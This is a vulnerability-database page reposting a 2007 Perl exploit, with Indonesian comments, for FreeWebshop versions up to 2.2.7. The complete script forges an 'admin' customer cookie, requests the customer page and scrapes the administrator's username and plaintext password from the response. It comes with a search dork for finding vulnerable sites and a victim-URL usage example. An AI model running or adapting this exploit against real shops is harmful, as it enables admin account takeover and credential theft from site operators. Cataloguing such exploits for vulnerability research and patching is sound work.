Lucene search
K

FreeWebshop <= 2.2.7 (cookie) Admin Password Grabber Exploit

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 25 Views

FreeWebshop 2.2.7 (cookie) Admin Password Grabber Exploit Indonesian Newhack Security Advisor

Code

                                                #!/usr/bin/perl
#
# Indonesian Newhack Security Advisory
# ------------------------------------
# FreeWebshop &#60;= 2.2.7 - (cookie) Admin Password Grabber Exploit
# Waktu			:  Dec 17 2007 04:50AM
# Software		:  FreeWebshop &#60;= 2.2.7
# Vendor		:  http://www.freewebshop.org/
# Demo Site		:  http://www.freewebshop.org/demo/
# Ditemukan oleh	:  k1tk4t  |  http://newhack.org
# Lokasi		:  Indonesia
# Dork			:  &#34;Powered by FreeWebshop&#34;
#
# Terima Kasih untuk;
# -[opt1lc, fl3xu5, ghoz]-
# str0ke, DNX, xoron, cyb3rh3b, K-159, the_hydra, y3dips
# nyubi,iFX,sin~X,kin9k0ng,bius,selikoer,aldy_BT
# Komunitas Security dan Hacker Indonesia
#
# ----------------------------[Cookie Injection]------------------------------------
use LWP::UserAgent;
use HTTP::Cookies;

if(!$ARGV[1])
{
 print &#34;\n  |-------------------------------------------------|&#34;;
 print &#34;\n  |         Indonesian Newhack Technology           |&#34;;
 print &#34;\n  |-------------------------------------------------|&#34;;
 print &#34;\n  |FreeWebshop 2.2.7 (cookie) Admin Password Grabber|&#34;;
 print &#34;\n  |     Found by k1tk4t [k1tk4t(at)newhack.org]     |&#34;;
 print &#34;\n  |-------------------------------------------------|&#34;;
 print &#34;\n[!] &#34;;
 print &#34;\n[!] Penggunaan : perl freewebshop227.pl [URL] [Path] &#34;;
 print &#34;\n[!] Contoh     : perl freewebshop227.pl http://korban.site /WebShop/&#34;;
 print &#34;\n[!] &#34;;
 print &#34;\n&#34;;
 exit;
}

my $site = $ARGV[0]; # Site Target
my $path = $ARGV[1]; # Path direktori envolution_1-0-1

my $www = new LWP::UserAgent;
#my @cookie = (&#39;Cookie&#39; =&#62; &#34;cookie_info=admin-1&#34;); #Untuk Versi &#60; = 2.2.4
my @cookie = (&#39;Cookie&#39; =&#62; &#34;fws_cust=admin-1&#34;); #Untuk Versi &#62; = 2.2.6
my $http = &#34;$site/$path/index.php?page=customer&action=show&#34;;
print &#34;\n\n [~] Sedang Mencari Username dan Password.... \n&#34;;
my $injek = $www -&#62; get($http, @cookie);
my $jawaban = $injek -&#62; content;
if( $jawaban =~ /login value=&#39;(.*)&#39;/ ){ print &#34;\n [+] Username: $1&#34;; 
$jawaban =~ /&#34;password&#34; name=&#34;pass1&#34; size=&#34;10&#34; maxlength=&#34;10&#34; value=&#34;(.*)&#34;/ , print &#34;\n [+] Password: $1 \n&#34;;} 
else {print &#34;\n [-] Gagal  :(  , Coba yang lain!&#34;;}

# ----------------------------[Selesai]------------------------------------

# milw0rm.com [2007-12-18]

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

01 Jul 2014 00:00Current
7.1High risk
Vulners AI Score7.1
25